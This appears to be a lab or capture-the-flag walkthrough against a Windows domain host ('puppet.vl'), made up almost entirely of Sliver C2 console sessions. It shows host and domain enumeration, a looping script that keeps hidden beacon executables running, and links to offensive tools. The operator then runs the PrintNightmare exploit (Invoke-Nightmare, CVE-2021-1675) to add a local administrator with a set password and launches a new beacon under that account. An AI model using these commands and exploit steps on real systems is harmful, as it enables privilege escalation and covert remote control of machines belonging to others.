whoami Get session user execution context
sliver (BLUSHING_ERROR) > whoami
Logon ID: PUPPET\bruce.smith
[*] Tasked beacon BLUSHING_ERROR (c232ad52)
sliver (BLUSHING_ERROR) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sliver (BLUSHING_ERROR) > interactive
[*] Using beacon's active C2 endpoint: mtls://172.16.40.200:8443
[*] Tasked beacon BLUSHING_ERROR (6757688d)
[*] Session 102be214 BLUSHING_ERROR - 172.16.40.50:51024 (File01) - windows/amd64 - Tue, 29 Sep 2026 02:37:09 EDT
sliver (BLUSHING_ERROR) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ==================== ========== ==================== ================== =========
102be214 mtls 172.16.40.50:51024 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
sliver (BLUSHING_ERROR) > use 102be214
[*] Active session BLUSHING_ERROR (102be214-d74c-4725-a447-91b830465330)
sliver (BLUSHING_ERROR) >
1
2
3
4
5
6
7
8
9
10
sliver (BLUSHING_ERROR) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 2460
PS C:\Windows\system32>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
PS C:\Windows\system32> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
puppet\bruce.smith S-1-5-21-3066630505-2324057459-3046381011-1126
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PUPPET\employees Group S-1-5-21-3066630505-2324057459-3046381011-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Windows\system32> ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : File01
Primary Dns Suffix . . . . . . . : puppet.vl
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : puppet.vl
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : A2-DE-AD-24-51-A0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::3ae:ec37:7f46:837c%3(Preferred)
IPv4 Address. . . . . . . . . . . : 172.16.40.50(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 134238294
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2E-87-26-99-00-0C-29-8F-31-EA
DNS Servers . . . . . . . . . . . : 172.16.40.5
NetBIOS over Tcpip. . . . . . . . : Enabled
PS C:\Windows\system32> hostname
hostname
File01
PS C:\Windows\system32> route print
route print
===========================================================================
Interface List
3...a2 de ad 24 51 a0 ......vmxnet3 Ethernet Adapter
1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
172.16.40.0 255.255.255.0 On-link 172.16.40.50 271
172.16.40.50 255.255.255.255 On-link 172.16.40.50 271
172.16.40.255 255.255.255.255 On-link 172.16.40.50 271
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 172.16.40.50 271
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 172.16.40.50 271
===========================================================================
Persistent Routes:
None
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 331 ::1/128 On-link
3 271 fe80::/64 On-link
3 271 fe80::3ae:ec37:7f46:837c/128
On-link
1 331 ff00::/8 On-link
3 271 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
PS C:\Windows\system32> net user
net user
User accounts for \\FILE01
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
The command completed successfully.
PS C:\Windows\system32> net group "Domain Admins" /domain
net group "Domain Admins" /domain
The request will be processed at a domain controller for domain puppet.vl.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
PS C:\Windows\system32> net group "Domain Computers" /domain
net group "Domain Computers" /domain
The request will be processed at a domain controller for domain puppet.vl.
Group name Domain Computers
Comment All workstations and servers joined to the domain
-------------------------------------------------------------------------------
FILE01$ PUPPET$
The command completed successfully.
PS C:\Windows\system32>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
PS C:\Windows\system32> tasklist /svc
tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 100 N/A
smss.exe 308 N/A
csrss.exe 428 N/A
csrss.exe 528 N/A
wininit.exe 552 N/A
winlogon.exe 600 N/A
services.exe 672 N/A
lsass.exe 688 KeyIso, Netlogon, SamSs
svchost.exe 800 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
fontdrvhost.exe 824 N/A
fontdrvhost.exe 832 N/A
svchost.exe 904 RpcEptMapper, RpcSs
svchost.exe 1008 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc,
Schedule, SENS, SessionEnv,
ShellHWDetection, Themes, TokenBroker,
UserManager, UsoSvc, Winmgmt, WpnService
svchost.exe 1016 TermService
svchost.exe 416 DsSvc, NcbService, PcaSvc, SysMain,
TabletInputService, TrkWks, UALSVC,
UmRdpService
svchost.exe 792 Dhcp, EventLog, lmhosts, TimeBrokerSvc,
WinHttpAutoProxySvc
svchost.exe 716 CDPSvc, DispBrokerDesktopSvc, EventSystem,
FontCache, LicenseManager, netprofm, nsi,
SstpSvc
svchost.exe 696 W32Time
svchost.exe 1100 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
dwm.exe 1200 N/A
svchost.exe 1244 BFE, mpssvc
svchost.exe 1384 Wcmsvc
svchost.exe 1644 PolicyAgent
svchost.exe 1728 CertPropSvc, RasMan
spoolsv.exe 1776 Spooler
svchost.exe 1848 DiagTrack
svchost.exe 1860 CoreMessagingRegistrar, DPS
svchost.exe 1908 camsvc, StateRepository
vm3dservice.exe 1984 vm3dservice
vmtoolsd.exe 2000 VMTools
VGAuthService.exe 1068 VGAuthService
svchost.exe 1368 LanmanServer
vm3dservice.exe 2204 N/A
dllhost.exe 2940 COMSysApp
AggregatorHost.exe 3032 N/A
msdtc.exe 2744 MSDTC
WmiPrvSE.exe 2892 N/A
ruby.exe 3988 puppet
svchost.exe 684 StorSvc
sihost.exe 3108 N/A
svchost.exe 3612 CDPUserSvc_a4950, WpnUserService_a4950
taskhostw.exe 3268 N/A
MicrosoftEdgeUpdate.exe 3216 N/A
ctfmon.exe 1568 N/A
explorer.exe 3212 N/A
StartMenuExperienceHost.e 1252 N/A
TextInputHost.exe 3148 N/A
RuntimeBroker.exe 1260 N/A
SearchApp.exe 4180 N/A
RuntimeBroker.exe 4312 N/A
RuntimeBroker.exe 4508 N/A
vmtoolsd.exe 4916 N/A
svchost.exe 4104 cbdhsvc_a4950
puppet-update.exe 4460 N/A
puppet-update.exe 4684 N/A
puppet-update.exe 1124 N/A
puppet-update.exe 2012 N/A
puppet-update.exe 2036 N/A
powershell.exe 2872 N/A
conhost.exe 1772 N/A
cmd.exe 4592 N/A
conhost.exe 3480 N/A
ruby.exe 4680 N/A
powershell.exe 2460 N/A
conhost.exe 2540 N/A
cmd.exe 4956 N/A
conhost.exe 5036 N/A
ruby.exe 4596 N/A
tasklist.exe 3864 N/A
PS C:\Windows\system32> netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 904
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1016
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 552
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 792
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1776
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 1008
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 1644
TCP 172.16.40.50:139 0.0.0.0:0 LISTENING 4
TCP 172.16.40.50:50834 172.16.40.200:8140 ESTABLISHED 4680
TCP 172.16.40.50:51024 172.16.40.200:8443 ESTABLISHED 4460
TCP [::]:135 [::]:0 LISTENING 904
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 1016
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 688
TCP [::]:49665 [::]:0 LISTENING 552
TCP [::]:49666 [::]:0 LISTENING 792
TCP [::]:49667 [::]:0 LISTENING 688
TCP [::]:49668 [::]:0 LISTENING 1776
TCP [::]:49669 [::]:0 LISTENING 1008
TCP [::]:49670 [::]:0 LISTENING 672
TCP [::]:49671 [::]:0 LISTENING 1644
UDP 0.0.0.0:123 *:* 696
UDP 0.0.0.0:500 *:* 1008
UDP 0.0.0.0:3389 *:* 1016
UDP 0.0.0.0:4500 *:* 1008
UDP 0.0.0.0:5353 *:* 1100
UDP 0.0.0.0:5355 *:* 1100
UDP 0.0.0.0:55397 *:* 1100
UDP 127.0.0.1:50164 127.0.0.1:50164 688
UDP 127.0.0.1:51368 127.0.0.1:51368 1008
UDP 172.16.40.50:137 *:* 4
UDP 172.16.40.50:138 *:* 4
UDP [::]:123 *:* 696
UDP [::]:500 *:* 1008
UDP [::]:3389 *:* 1016
UDP [::]:4500 *:* 1008
UDP [::]:5353 *:* 1100
UDP [::]:5355 *:* 1100
UDP [::]:55397 *:* 1100
PS C:\Windows\system32>
Here I checked the Puppet service configuration, running updater processes, and related files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
PS C:\Windows\system32> sc.exe qc puppet
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: puppet
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Puppet Labs\Puppet\sys\ruby\bin\ruby.exe" -rubygems "C:\Program Files\Puppet Labs\Puppet\service\daemon.rb"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Puppet Agent
DEPENDENCIES :
SERVICE_START_NAME : svc_puppet_win_t1@puppet.vl
PS C:\Windows\system32> Get-CimInstance Win32_Process | Where-Object {$_.Name -in @('puppet-update.exe','ruby.exe')} | Select-Object ProcessId,ParentProcessId,ExecutablePath,CommandLine | Format-List
ProcessId : 3988
ParentProcessId : 672
ExecutablePath :
CommandLine :
ProcessId : 4460
ParentProcessId : 4536
ExecutablePath : C:\ProgramData\Puppet\puppet-update.exe
CommandLine : "C:\ProgramData\Puppet\puppet-update.exe"
ProcessId : 4684
ParentProcessId : 4536
ExecutablePath : C:\ProgramData\Puppet\puppet-update.exe
CommandLine : "C:\ProgramData\Puppet\puppet-update.exe"
ProcessId : 1124
ParentProcessId : 4536
ExecutablePath : C:\ProgramData\Puppet\puppet-update.exe
CommandLine : "C:\ProgramData\Puppet\puppet-update.exe"
ProcessId : 2012
ParentProcessId : 4536
ExecutablePath : C:\ProgramData\Puppet\puppet-update.exe
CommandLine : "C:\ProgramData\Puppet\puppet-update.exe"
ProcessId : 2036
ParentProcessId : 4536
ExecutablePath : C:\ProgramData\Puppet\puppet-update.exe
CommandLine : "C:\ProgramData\Puppet\puppet-update.exe"
PS C:\Windows\system32> puppet config print confdir
C:/Users/bruce.smith/.puppetlabs/etc/puppet
PS C:\Windows\system32> puppet config print server
puppet
PS C:\Windows\system32> puppet config print ssldir
C:/Users/bruce.smith/.puppetlabs/etc/puppet/ssl
PS C:\Windows\system32> Get-ChildItem C:\ProgramData\Puppet -Force
Directory: C:\ProgramData\Puppet
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/12/2025 6:57 AM 15915008 puppet-update.exe
-a---- 9/4/2025 8:24 AM 651 puppet.ps1
PS C:\ProgramData\Puppet> type puppet.ps1
$exePath = "C:\ProgramData\Puppet\puppet-update.exe"
$targetCount = 5
while ($true) {
$processes = Get-Process -Name "puppet-update" -ErrorAction SilentlyContinue
$currentCount = if ($processes) { $processes.Count } else { 0 }
if ($currentCount -lt $targetCount) {
$toStart = $targetCount - $currentCount
Write-Host "Only $currentCount processes running. Starting $toStart more..."
for ($i = 1; $i -le $toStart; $i++) {
Start-Process -FilePath $exePath -WindowStyle Hidden
}
} else {
Write-Host "$currentCount processes are running."
}
Start-Sleep -Seconds 30
}
PS C:\ProgramData\Puppet>
PS C:\Windows\system32> Get-ChildItem C:\ProgramData\Puppet -Recurse -Force -ErrorAction SilentlyContinue | Select-Object FullName
FullName
--------
C:\ProgramData\Puppet\puppet-update.exe
C:\ProgramData\Puppet\puppet.ps1
PS C:\Windows\system32> Get-Item C:\ProgramData\Puppet\puppet-update.exe | Format-List *
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\ProgramData\Puppet\puppet-update.exe
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\ProgramData\Puppet
PSChildName : puppet-update.exe
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
Mode : -a----
VersionInfo : File: C:\ProgramData\Puppet\puppet-update.exe
InternalName:
OriginalFilename:
FileVersion:
FileDescription:
Product:
ProductVersion:
Debug: False
Patched: False
PreRelease: False
PrivateBuild: False
SpecialBuild: False
Language:
BaseName : puppet-update
Target : {}
LinkType :
Name : puppet-update.exe
Length : 15915008
DirectoryName : C:\ProgramData\Puppet
Directory : C:\ProgramData\Puppet
IsReadOnly : False
Exists : True
FullName : C:\ProgramData\Puppet\puppet-update.exe
Extension : .exe
CreationTime : 10/12/2024 1:50:21 AM
CreationTimeUtc : 10/12/2024 8:50:21 AM
LastAccessTime : 12/12/2025 6:57:36 AM
LastAccessTimeUtc : 12/12/2025 2:57:36 PM
LastWriteTime : 12/12/2025 6:57:36 AM
LastWriteTimeUtc : 12/12/2025 2:57:36 PM
Attributes : Archive, NotContentIndexed
PS C:\Windows\system32> sc.exe query Spooler
SERVICE_NAME: Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Windows\system32> Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
PS C:\Windows\system32> Get-Service Spooler
PS C:\Windows\system32> reg query "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /s
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
Restricted REG_DWORD 0x1
TrustedServers REG_DWORD 0x0
ServerList REG_SZ
InForest REG_DWORD 0x0
NoWarningNoElevationOnInstall REG_DWORD 0x1
UpdatePromptSettings REG_DWORD 0x1
RestrictDriverInstallationToAdministrators REG_DWORD 0x0
PS C:\Windows\system32> reg query "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /s
ERROR: The system was unable to find the specified registry key or value.
PS C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows Server 2022 Standard
OS Version: 10.0.20348 N/A Build 20348
PS C:\Windows\system32>
https://github.com/SpecterOps/SharpHound/releases/tag/v2.16.0
https://github.com/itm4n/PrivescCheck/releases
https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1
sliver (BLUSHING_ERROR) > execute -o – cmd.exe /c “net user /domain”
[*] Output: The request will be processed at a domain controller for domain puppet.vl.
User accounts for \DC01.puppet.vl
Administrator Alan.Carr Beth.Fletcher
Brenda.Nicholls Bruce.Smith Callum.Barber
Chloe.Powell Damien.Brown Elaine.Wilson
Francis.Payne George.Smith Guest
Hannah.Begum Joanne.Morris Judith.Burton
June.Lewis Kelly.Rowe krbtgt
Leigh.Coates Leigh.Hamilton Leonard.Woods
Paige.Jones Pamela.Oliver Phillip.Rowe
Richard.Buckley root Simon.Parkes
Stanley.White svc_puppet_lin_t1 svc_puppet_win_t0
svc_puppet_win_t1 Tracy.Roberts
The command completed successfully.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
```jsx
sliver (BLUSHING_ERROR) > execute -o -- powershell.exe -ExecutionPolicy Bypass -NoProfile -Command ". 'C:\Windows\Temp\CVE-2021-1675.ps1'; Invoke-Nightmare -NewUser admin1 -NewPassword 'password1'"
⠋ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠙ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠹ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠸ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠼ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠴ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠦ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠧ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠇ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠏ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠋ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠙ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE ⠹ Executing powershell.exe -ExecutionPolicy Bypass -NoProfile -Command . 'C:\Windows\Temp\CVE[*] Output:
[+] created payload at C:\Users\bruce.smith\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_0a3468baaae9fedd\Amd64\mxdwdrv.dll"
[+] added user admin1 as local administrator
[+] deleting payload from C:\Users\bruce.smith\AppData\Local\Temp\nightmare.dll
sliver (BLUSHING_ERROR) >
```jsx
sliver (BLUSHING_ERROR) > execute -o -- cmd.exe /c "net localgroup Administrators"
[*] Output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
-------------------------------------------------------------------------------
Administrator
PUPPET\admins_t1
PUPPET\Domain Admins
The command completed successfully.
sliver (BLUSHING_ERROR) > execute -o -- cmd.exe /c "dir C:\ProgramData\Puppet\puppet-update.exe"
[*] Output:
Volume in drive C has no label.
Volume Serial Number is B2BE-392E
Directory of C:\ProgramData\Puppet
12/12/2025 07:57 AM 15,915,008 puppet-update.exe
1 File(s) 15,915,008 bytes
0 Dir(s) 5,730,820,096 bytes free
sliver (BLUSHING_ERROR) > execute -o -- powershell.exe -ExecutionPolicy Bypass -NoProfile -Command ". 'C:\Windows\Temp\CVE-2021-1675.ps1'; Invoke-Nightmare -NewUser admin1 -NewPassword 'P@ssw0rd'"
sliver (BLUSHING_ERROR) > execute -o -- cmd.exe /c "net user admin1"
[*] Output:
User name admin1
Full Name admin1
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/29/2026 10:03:37 PM
Password expires Never
Password changeable 9/30/2026 10:03:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
sliver (BLUSHING_ERROR) > execute -o -- cmd.exe /c "net localgroup Administrators"
-------------------------------------------------------------------------------
admin1
Administrator
PUPPET\admins_t1
PUPPET\Domain Admins
The command completed successfully.
sliver (BLUSHING_ERROR) >
sliver (BLUSHING_ERROR) > runas -d FILE01 -u admin1 -P "P@ssw0rd" -p C:\\ProgramData\\Puppet\\puppet-update.exe
[*] Successfully ran C:\ProgramData\Puppet\puppet-update.exe on BLUSHING_ERROR
[*] Beacon 6b4df07e BLUSHING_ERROR - 172.16.40.50:50677 (File01) - windows/amd64 - Wed, 30 Sep 2026 01:06:13 EDT
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ==================== ========== ==================== ================== =========
43c2cc17 mtls 172.16.40.50:50061 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
f83c8072 mtls 172.16.40.50:50054 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
963884a1 mtls 172.16.40.50:50055 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
sliver (BLUSHING_ERROR) > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ==================== ================== =============== ===============
c2bc9d9f BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 18s 56s
7f369ddc BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 55s 12s
f9359c28 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 36s 42s
b6c9c08a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 57s 5s
32980854 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 25s 37s
6b4df07e BLUSHING_ERROR mtls File01 <err> windows/amd64 13s 59s
ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In
========== ================ ======= =========== ==================== ========== ==================== ================== ======== ========================================= =======================================
c2bc9d9f BLUSHING_ERROR 3/3 mtls 172.16.40.50:49726 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:06:07 EDT 2026 (29s ago) Wed Sep 30 01:07:21 EDT 2026 (in 45s)
7f369ddc BLUSHING_ERROR 0/0 mtls 172.16.40.50:49722 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:05:30 EDT 2026 (1m6s ago) Wed Sep 30 01:06:37 EDT 2026 (in 1s)
f9359c28 BLUSHING_ERROR 0/0 mtls 172.16.40.50:49725 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:05:49 EDT 2026 (47s ago) Wed Sep 30 01:07:07 EDT 2026 (in 31s)
b6c9c08a BLUSHING_ERROR 0/0 mtls 172.16.40.50:49723 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:05:28 EDT 2026 (1m8s ago) Wed Sep 30 01:06:30 EDT 2026 (6s ago)
32980854 BLUSHING_ERROR 0/0 mtls 172.16.40.50:49724 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:06:00 EDT 2026 (36s ago) Wed Sep 30 01:07:02 EDT 2026 (in 26s)
6b4df07e BLUSHING_ERROR 0/0 mtls 172.16.40.50:50677 File01 <err> windows/amd64 en-US Wed Sep 30 01:06:12 EDT 2026 (24s ago) Wed Sep 30 01:07:24 EDT 2026 (in 48s)
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ================ =========== ==================== ========== ==================== ================== ======== ========================================== =========
43c2cc17 BLUSHING_ERROR mtls 172.16.40.50:50061 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:05:05 EDT 2026 (1m42s ago) [ALIVE]
f83c8072 BLUSHING_ERROR mtls 172.16.40.50:50054 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:06:15 EDT 2026 (32s ago) [ALIVE]
963884a1 BLUSHING_ERROR mtls 172.16.40.50:50055 File01 PUPPET\bruce.smith windows/amd64 en-US Wed Sep 30 01:06:11 EDT 2026 (36s ago) [ALIVE]
sliver (BLUSHING_ERROR) > execute -o -- whoami
[*] Output:
puppet\bruce.smith
sliver (BLUSHING_ERROR) > use 6b4df07e
[*] Active beacon BLUSHING_ERROR (6b4df07e-15a4-49a7-ad53-7b06cada84f5)
sliver (BLUSHING_ERROR) > interactive
[*] Using beacon's active C2 endpoint: mtls://172.16.40.200:8443
[*] Tasked beacon BLUSHING_ERROR (ba67155b)
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ==================== ========== ==================== ================== =========
43c2cc17 mtls 172.16.40.50:50061 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
963884a1 mtls 172.16.40.50:50055 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
f83c8072 mtls 172.16.40.50:50054 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
sliver (BLUSHING_ERROR) > tasks
ID State Message Type Created Sent Completed
========== ========= ============== =============================== ====== ===========
ba67155b pending OpenSession Wed, 30 Sep 2026 01:07:44 EDT
[*] Session 1e1cf5b6 BLUSHING_ERROR - 172.16.40.50:50693 (File01) - windows/amd64 - Wed, 30 Sep 2026 01:08:37 EDT
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ==================== ================== =============== ===============
c2bc9d9f BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 4s 1m7s
7f369ddc BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 39s 43s
f9359c28 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 25s 42s
